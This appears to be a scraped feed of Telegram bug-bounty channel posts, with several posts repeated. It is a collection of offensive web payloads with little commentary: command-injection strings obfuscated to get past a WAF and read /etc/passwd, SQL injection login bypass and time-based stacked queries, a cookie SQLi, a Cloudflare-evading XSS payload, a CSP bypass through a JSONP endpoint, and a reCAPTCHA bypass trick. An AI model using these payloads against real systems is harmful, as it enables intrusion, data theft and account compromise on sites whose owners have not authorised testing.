Not only crawling but you can do Subdomain Enumeration using Wayback.
——————
0Day.Today
@LearnExploit
@Tech_Army
curl --insecure --silent "https://web.archive.org/cdx/search/cdx…" | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sed "/@/d" | sed -e 's/\.$//' | sort -u
#bugbounty ——————
0Day.Today
@LearnExploit
@Tech_Army
👍3
Bypass Captcha (Google reCAPTCHA)
1 . Try changing the request method, for example POST to GET
POST / HTTP 1.1
Host: https://target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
#bugbounty #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
1 . Try changing the request method, for example POST to GET
POST / HTTP 1.1
Host: https://target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
#bugbounty #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍5
RCE WAF Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
#bugbounty #RCE #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
#bugbounty #RCE #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍8
Payload Injector:
➕ Debinject:
😸 GitHub
➕ Pixload:
😸 GitHub
➕ Gospider:
😸 GitHub
#Injection #Hacking_Tool #BugBounty
BugCod3
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
🔥 👤 t.iss.one/LearnExploit
📢 t.iss.one/Tech_Army
#Injection #Hacking_Tool #BugBounty
BugCod3
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
You can bypass CSP on any website that allows https://microsoft.com in a script-src
PoC:
octagon.net
#BugBounty #bypass #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
PoC:
<script src=https://microsoft.com/en-us/research/wp-json?_jsonp=alert></script>
This works because of the WordPress CSP bypass our engineer (octagon) found last year : octagon.net
#BugBounty #bypass #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
👍5🤔2
another #SQLi found! This time Microsoft SQL Server database vulnerable to stacked queries.
Payload
#VPD #BugBounty #security
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
🔥
📣 t.iss.one/LearnExploit
Payload
' or 1=1 -- - bypassed the login site, and then confirmed injection point with ';WAITFOR DELAY '0:0:5'-- executing a 5s delay#VPD #BugBounty #security
0Day.Today Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5❤2👍1🔥1
cloudflare WAF bypass XSS
any payload they blocked by cloudflare
this payload working
#Cloudflare #Bugbounty #Tip
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 t.iss.one/BugCod3
📣 t.iss.one/LearnExploit
any payload they blocked by cloudflare
this payload working
"><img src=x onerrora=confirm() onerror=confirm(1)>#Cloudflare #Bugbounty #Tip
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5⚡3🔥2👍1👏1
Google Bug Bounty Dorks Generator
🌎 Site
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 t.iss.one/BugCod3
📣 t.iss.one/LearnExploit
#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7⚡2❤1💯1
Found SQL Injection in [org_id] Cookie
Payloads for Testing:
Injected in request like this
#BugBounty #Tips #SQL
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 t.iss.one/BugCod3
📣 t.iss.one/LearnExploit
Payloads for Testing:
-1 OR 0=6 AND 0-0=> FALSE-1 OR 6=6 AND 0-0=> TRUEInjected in request like this
Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0#BugBounty #Tips #SQL
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡7❤2🔥1💯1